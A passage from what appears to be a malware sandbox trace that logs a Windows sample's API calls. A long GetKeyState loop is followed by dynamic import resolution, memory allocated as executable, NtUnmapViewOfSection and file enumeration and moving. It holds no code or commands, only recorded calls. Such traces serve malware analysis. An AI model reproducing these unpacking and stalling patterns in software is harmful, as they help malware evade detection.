(hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.403] GetKeyState (nVirtKey=1) returned 0 [0029.403] GetStretchBltMode (hdc=0x1) returned 0 [0029.403] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.404] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.404] GetKeyState (nVirtKey=1) returned 0 [0029.404] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.405] GetKeyState (nVirtKey=1) returned 0 [0029.405] GetStretchBltMode (hdc=0x1) returned 0 [0029.405] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.406] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.406] GetKeyState (nVirtKey=1) returned 0 [0029.406] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.407] GetStretchBltMode (hdc=0x1) returned 0 [0029.407] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.407] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.408] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.408] GetKeyState (nVirtKey=1) returned 0 [0029.408] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.409] GetStretchBltMode (hdc=0x1) returned 0 [0029.409] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.409] GetKeyState (nVirtKey=1) returned 0 [0029.410] GetStretchBltMode (hdc=0x1) returned 0 [0029.410] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.410] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.411] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.411] GetKeyState (nVirtKey=1) returned 0 [0029.411] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.412] GetKeyState (nVirtKey=1) returned 0 [0029.412] GetStretchBltMode (hdc=0x1) returned 0 [0029.412] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.413] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.413] GetKeyState (nVirtKey=1) returned 0 [0029.413] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.414] GetKeyState (nVirtKey=1) returned 0 [0029.414] GetStretchBltMode (hdc=0x1) returned 0 [0029.414] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0029.420] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0029.421] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0029.421] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0029.421] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0029.421] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0029.421] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0029.421] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0029.421] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAlloc") returned 0x76c1e365 [0029.421] VirtualAlloc (lpAddress=0x0, dwSize=0xe000, flAllocationType=0x3000, flProtect=0x40) returned 0x220000 [0029.422] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 1 [0029.425] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0029.425] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0029.425] GetProcAddress (hModule=0x77c40000, lpProcName="NtUnmapViewOfSection") returned 0x77c5fc70 [0029.425] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0029.425] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0029.425] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0029.425] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="_chkstk") returned 0x77c7ad68 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="memcmp") returned 0x77c72265 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0029.427] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0029.428] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0029.428] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0029.428] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0029.428] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0029.428] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldvrm") returned 0x77c6f880 [0029.428] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0029.428] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0029.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0029.428] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0029.428] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrW") returned 0x77303ef0 [0029.428] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0029.428] GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExW") returned 0x77320196 [0029.429] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimW") returned 0x773031bc [0029.429] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0029.429] GetProcAddress (hModule=0x772f0000, lpProcName="StrCmpNW") returned 0x77305cc4 [0029.429] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0029.429] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0029.429] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0029.429] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0029.430] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0029.431] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0029.432] GetProcAddress 